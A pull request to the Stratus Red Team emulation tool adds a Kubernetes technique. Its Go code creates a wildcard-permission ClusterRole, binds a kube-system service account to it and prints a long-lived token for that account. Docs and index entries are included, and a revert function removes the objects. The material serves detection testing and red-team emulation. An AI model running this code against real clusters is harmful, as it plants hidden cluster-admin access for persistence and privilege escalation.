### PR TITLE
New attack technique: Create ClusterAdmin role

### DIFF
--- a/docs/attack-techniques/kubernetes/index.md
+++ b/docs/attack-techniques/kubernetes/index.md
@@ -9,9 +9,14 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 - [Steal Pod Service Account Token](./k8s.credential-access.steal-serviceaccount-token.md)
 
 
+## Persistence
+
+- [Create Admin ClusterRole](./k8s.persistence.create-admin-clusterrole.md)
+
+
 ## Privilege Escalation
 
-- [Create Admin ClusterRole](./k8s.privilege-escalation.create-admin-clusterrole.md)
+- [Create Admin ClusterRole](./k8s.persistence.create-admin-clusterrole.md)
 
 - [Container breakout via hostPath volume mount](./k8s.privilege-escalation.hostpath-volume.md)
 

--- a/docs/attack-techniques/kubernetes/index.md
+++ b/docs/attack-techniques/kubernetes/index.md
@@ -11,7 +11,7 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 ## Privilege Escalation
 
-- [Create Admin ClusterRole](./k8s.persistence.create-admin-clusterrole.md)
+- [Create Admin ClusterRole](./k8s.privilege-escalation.create-admin-clusterrole.md)
 
 - [Container breakout via hostPath volume mount](./k8s.privilege-escalation.hostpath-volume.md)
 

--- a/docs/attack-techniques/kubernetes/index.md
+++ b/docs/attack-techniques/kubernetes/index.md
@@ -11,6 +11,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 ## Privilege Escalation
 
+- [Create Admin ClusterRole](./k8s.persistence.create-admin-clusterrole.md)
+
 - [Container breakout via hostPath volume mount](./k8s.privilege-escalation.hostpath-volume.md)
 
 - [Run a Privileged Pod](./k8s.privilege-escalation.privileged-pod.md)

--- a/docs/attack-techniques/kubernetes/k8s.persistence.create-admin-clusterrole.md
+++ b/docs/attack-techniques/kubernetes/k8s.persistence.create-admin-clusterrole.md
@@ -12,6 +12,7 @@ Platform: kubernetes
 ## MITRE ATT&CK Tactics
 
 
+- Persistence
 - Privilege Escalation
 
 ## Description
@@ -26,7 +27,7 @@ Creates a Service Account bound to a cluster administrator role.
 - Create a Cluster Role with administrative permissions
 - Create a Service Account (in the kube-system namespace)
 - Create a Cluster Role Binding
-- Create a service account token, simulating an attacker stealing a service account token for the newly created admin role
+- Retrieve the long-lived service account token, stored by K8s in a secret
 
 
 ## Instructions

--- a/docs/attack-techniques/kubernetes/k8s.persistence.create-admin-clusterrole.md
+++ b/docs/attack-techniques/kubernetes/k8s.persistence.create-admin-clusterrole.md
@@ -1,0 +1,36 @@
+---
+title: Create Admin ClusterRole
+---
+
+# Create Admin ClusterRole
+
+
+
+
+Platform: kubernetes
+
+## MITRE ATT&CK Tactics
+
+
+- Privilege Escalation
+
+## Description
+
+
+Creates a Service Account bound to a cluster administrator role.
+
+<span style="font-variant: small-caps;">Warm-up</span>: None
+
+<span style="font-variant: small-caps;">Detonation</span>: 
+
+- Create a Cluster Role with administrative permissions
+- Create a Service Account (in the kube-system namespace)
+- Create a Cluster Role Binding
+- Create a service account token, simulating an attacker stealing a service account token for the newly created admin role
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate k8s.persistence.create-admin-clusterrole
+```

--- a/docs/attack-techniques/kubernetes/k8s.privilege-escalation.create-admin-clusterrole.md
+++ b/docs/attack-techniques/kubernetes/k8s.privilege-escalation.create-admin-clusterrole.md
@@ -1,0 +1,36 @@
+---
+title: Create Admin ClusterRole
+---
+
+# Create Admin ClusterRole
+
+
+
+
+Platform: kubernetes
+
+## MITRE ATT&CK Tactics
+
+
+- Privilege Escalation
+
+## Description
+
+
+Creates a Service Account bound to a cluster administrator role.
+
+<span style="font-variant: small-caps;">Warm-up</span>: None
+
+<span style="font-variant: small-caps;">Detonation</span>: 
+
+- Create a Cluster Role with administrative permissions
+- Create a Service Account (in the kube-system namespace)
+- Create a Cluster Role Binding
+- Create a service account token, simulating an attacker stealing a service account token for the newly created admin role
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate k8s.privilege-escalation.create-admin-clusterrole
+```

--- a/docs/attack-techniques/kubernetes/k8s.privilege-escalation.privileged-pod.md
+++ b/docs/attack-techniques/kubernetes/k8s.privilege-escalation.privileged-pod.md
@@ -58,7 +58,7 @@ Sample event (shortened):
 			"path": "/api/v1/namespaces/stratus-red-team-umusjhhg/pods"
 		},
 		"method": "create",
-		"status_code": 201,
+		"status_code": 201
 	},
 	"stage": "ResponseComplete",
 	"kind": "Event",
@@ -75,11 +75,6 @@ Sample event (shortened):
 					"privileged": true
 				}
 			}]
-		},
-		"apiVersion": "v1",
-		"metadata": {
-			"namespace": "stratus-red-team-umusjhhg",
-			"name": "k8s.privilege-escalation.privileged-pod"
 		}
 	}
 }

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -33,6 +33,6 @@ This page contains the list of all Stratus Attack Techniques.
 | [Create a Login Profile on an IAM User](./AWS/aws.persistence.iam-create-user-login-profile.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Backdoor Lambda Function Through Resource-Based Policy](./AWS/aws.persistence.lambda-backdoor-function.md) | [AWS](./AWS/index.md) | Persistence |
 | [Steal Pod Service Account Token](./kubernetes/k8s.credential-access.steal-serviceaccount-token.md) | [kubernetes](./kubernetes/index.md) | Credential Access |
-| [Create Admin ClusterRole](./kubernetes/k8s.privilege-escalation.create-admin-clusterrole.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |
+| [Create Admin ClusterRole](./kubernetes/k8s.persistence.create-admin-clusterrole.md) | [kubernetes](./kubernetes/index.md) | Persistence, Privilege Escalation |
 | [Container breakout via hostPath volume mount](./kubernetes/k8s.privilege-escalation.hostpath-volume.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |
 | [Run a Privileged Pod](./kubernetes/k8s.privilege-escalation.privileged-pod.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -33,5 +33,6 @@ This page contains the list of all Stratus Attack Techniques.
 | [Create a Login Profile on an IAM User](./AWS/aws.persistence.iam-create-user-login-profile.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Backdoor Lambda Function Through Resource-Based Policy](./AWS/aws.persistence.lambda-backdoor-function.md) | [AWS](./AWS/index.md) | Persistence |
 | [Steal Pod Service Account Token](./kubernetes/k8s.credential-access.steal-serviceaccount-token.md) | [kubernetes](./kubernetes/index.md) | Credential Access |
+| [Create Admin ClusterRole](./kubernetes/k8s.persistence.create-admin-clusterrole.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |
 | [Container breakout via hostPath volume mount](./kubernetes/k8s.privilege-escalation.hostpath-volume.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |
 | [Run a Privileged Pod](./kubernetes/k8s.privilege-escalation.privileged-pod.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -33,6 +33,6 @@ This page contains the list of all Stratus Attack Techniques.
 | [Create a Login Profile on an IAM User](./AWS/aws.persistence.iam-create-user-login-profile.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Backdoor Lambda Function Through Resource-Based Policy](./AWS/aws.persistence.lambda-backdoor-function.md) | [AWS](./AWS/index.md) | Persistence |
 | [Steal Pod Service Account Token](./kubernetes/k8s.credential-access.steal-serviceaccount-token.md) | [kubernetes](./kubernetes/index.md) | Credential Access |
-| [Create Admin ClusterRole](./kubernetes/k8s.persistence.create-admin-clusterrole.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |
+| [Create Admin ClusterRole](./kubernetes/k8s.privilege-escalation.create-admin-clusterrole.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |
 | [Container breakout via hostPath volume mount](./kubernetes/k8s.privilege-escalation.hostpath-volume.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |
 | [Run a Privileged Pod](./kubernetes/k8s.privilege-escalation.privileged-pod.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |

--- a/internal/attacktechniques/k8s/persistence/create-admin-clusterrole/main.go
+++ b/internal/attacktechniques/k8s/persistence/create-admin-clusterrole/main.go
@@ -1,0 +1,122 @@
+package kubernetes
+
+import (
+	"context"
+	_ "embed"
+	"errors"
+	"github.com/aws/smithy-go/ptr"
+	authenticationv1 "k8s.io/api/authentication/v1"
+	corev1 "k8s.io/api/core/v1"
+	rbacv1 "k8s.io/api/rbac/v1"
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"log"
+
+	"github.com/datadog/stratus-red-team/internal/providers"
+	"github.com/datadog/stratus-red-team/pkg/stratus"
+	"github.com/datadog/stratus-red-team/pkg/stratus/mitreattack"
+)
+
+func init() {
+	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+		ID:                 "k8s.persistence.create-admin-clusterrole",
+		FriendlyName:       "Create Admin ClusterRole",
+		Platform:           stratus.Kubernetes,
+		IsIdempotent:       false,
+		MitreAttackTactics: []mitreattack.Tactic{mitreattack.PrivilegeEscalation},
+		Description: `
+Creates a Service Account bound to a cluster administrator role.
+
+Warm-up: None
+
+Detonation: 
+
+- Create a Cluster Role with administrative permissions
+- Create a Service Account (in the ` + namespace + ` namespace)
+- Create a Cluster Role Binding
+- Create a service account token, simulating an attacker stealing a service account token for the newly created admin role
+`,
+		Detonate: detonate,
+		Revert:   revert,
+	})
+}
+
+// Namespace to create the service account in
+const namespace = "kube-system"
+
+var all = []string{"*"}
+
+var clusterRole = &rbacv1.ClusterRole{
+	ObjectMeta: metav1.ObjectMeta{Name: "stratus-red-team-clusterrole"},
+	Rules:      []rbacv1.PolicyRule{{Verbs: all, APIGroups: all, Resources: all}},
+}
+
+var serviceAccount = &corev1.ServiceAccount{
+	ObjectMeta:                   metav1.ObjectMeta{Name: "stratus-red-team-serviceaccount"},
+	AutomountServiceAccountToken: ptr.Bool(true),
+}
+
+var clusterRoleBinding = &rbacv1.ClusterRoleBinding{
+	ObjectMeta: metav1.ObjectMeta{Name: "stratus-red-team-crb"},
+	Subjects:   []rbacv1.Subject{{Kind: rbacv1.ServiceAccountKind, Name: serviceAccount.Name, Namespace: namespace}},
+	RoleRef:    rbacv1.RoleRef{Kind: "ClusterRole", Name: clusterRole.Name},
+}
+
+func detonate(map[string]string) error {
+	client := providers.K8s().GetClient()
+
+	log.Println("Creating Cluster Role " + clusterRole.ObjectMeta.Name)
+	_, err := client.RbacV1().ClusterRoles().Create(context.Background(), clusterRole, metav1.CreateOptions{})
+	if err != nil {
+		return errors.New("unable to create ClusterRole: " + err.Error())
+	}
+
+	log.Println("Creating Service Account " + serviceAccount.Name)
+	_, err = client.CoreV1().ServiceAccounts(namespace).Create(context.Background(), serviceAccount, metav1.CreateOptions{})
+	if err != nil {
+		return errors.New("unable to create ServiceAccount: " + err.Error())
+	}
+
+	log.Println("Creating Cluster Role Binding to map the service account to the cluster role")
+	_, err = client.RbacV1().ClusterRoleBindings().Create(context.Background(), clusterRoleBinding, metav1.CreateOptions{})
+	if err != nil {
+		return errors.New("unable to create ClusterRoleBinding: " + err.Error())
+	}
+
+	log.Println("Generating a service account token for this service account")
+	tokenResponse, err := client.CoreV1().ServiceAccounts(namespace).CreateToken(
+		context.Background(),
+		serviceAccount.Name,
+		&authenticationv1.TokenRequest{Spec: authenticationv1.TokenRequestSpec{ExpirationSeconds: ptr.Int64(3600 * 10)}},
+		metav1.CreateOptions{},
+	)
+	if err != nil {
+		return errors.New("unable to generate a service account token: " + err.Error())
+	}
+
+	log.Println("Successfully generate service account token: \n\n" + tokenResponse.Status.Token)
+	return nil
+}
+
+func revert(map[string]string) error {
+	client := providers.K8s().GetClient()
+	roleName := clusterRole.Name
+	deleteOpts := metav1.DeleteOptions{GracePeriodSeconds: ptr.Int64(0)}
+
+	log.Println("Deleting ClusterRole " + roleName)
+	err := client.RbacV1().ClusterRoles().Delete(context.Background(), roleName, deleteOpts)
+	if err != nil {
+		return errors.New("unable to remove ClusterRole " + err.Error())
+	}
+
+	err = client.CoreV1().ServiceAccounts(namespace).Delete(context.Background(), serviceAccount.Name, deleteOpts)
+	if err != nil {
+		return errors.New("unable to remove ServiceAccount " + err.Error())
+	}
+
+	err = client.RbacV1().ClusterRoleBindings().Delete(context.Background(), clusterRoleBinding.Name, deleteOpts)
+	if err != nil {
+		return errors.New("unable to remove ClusterRoleBinding: " + err.Error())
+	}
+
+	return nil
+}

--- a/internal/attacktechniques/k8s/privilege-escalation/create-admin-clusterrole/main.go
+++ b/internal/attacktechniques/k8s/privilege-escalation/create-admin-clusterrole/main.go
@@ -18,7 +18,7 @@ import (
 
 func init() {
 	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
-		ID:                 "k8s.persistence.create-admin-clusterrole",
+		ID:                 "k8s.privilege-escalation.create-admin-clusterrole",
 		FriendlyName:       "Create Admin ClusterRole",
 		Platform:           stratus.Kubernetes,
 		IsIdempotent:       false,

--- a/internal/attacktechniques/main.go
+++ b/internal/attacktechniques/main.go
@@ -25,7 +25,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/persistence/iam-create-user-login-profile"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/persistence/lambda-backdoor-function"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/credential-access/steal-serviceaccount-token"
-	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/create-admin-clusterrole"
+	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/persistence/create-admin-clusterrole"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/hostpath-volume"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/privileged-pod"
 )

--- a/internal/attacktechniques/main.go
+++ b/internal/attacktechniques/main.go
@@ -25,7 +25,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/persistence/iam-create-user-login-profile"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/persistence/lambda-backdoor-function"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/credential-access/steal-serviceaccount-token"
-	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/persistence/create-admin-clusterrole"
+	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/create-admin-clusterrole"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/hostpath-volume"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/privileged-pod"
 )

--- a/internal/attacktechniques/main.go
+++ b/internal/attacktechniques/main.go
@@ -25,6 +25,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/persistence/iam-create-user-login-profile"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/persistence/lambda-backdoor-function"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/credential-access/steal-serviceaccount-token"
+	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/persistence/create-admin-clusterrole"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/hostpath-volume"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/privileged-pod"
 )


### PR DESCRIPTION
### What does this PR do?

Introduce a new TTP
### Checklist


- [x] The attack technique emulates a single attack step, not a full attack chain
- [x] We have factual evidence & references that the attack technique was used by real malware, pentesters, or attackers - common privesc / persistence TTP
- [x] The attack technique makes no assumption about the state of the environment prior to warming it up

### Discussion points

- Should this be privesc or persistence?

### Sample output

```
2022/02/07 23:28:36 Checking your authentication against Kubernetes
2022/02/07 23:28:36 Creating Cluster Role stratus-red-team-clusterrole
2022/02/07 23:28:36 Creating Service Account stratus-red-team-serviceaccount
2022/02/07 23:28:36 Creating Cluster Role Binding to map the service account to the cluster role
2022/02/07 23:28:36 Successfully generate service account token:

eyJhbGciO...
```

Decoding to:

![image](https://user-images.githubusercontent.com/136675/152883004-0d23d47a-192a-4234-967a-7ef8e36fa025.png)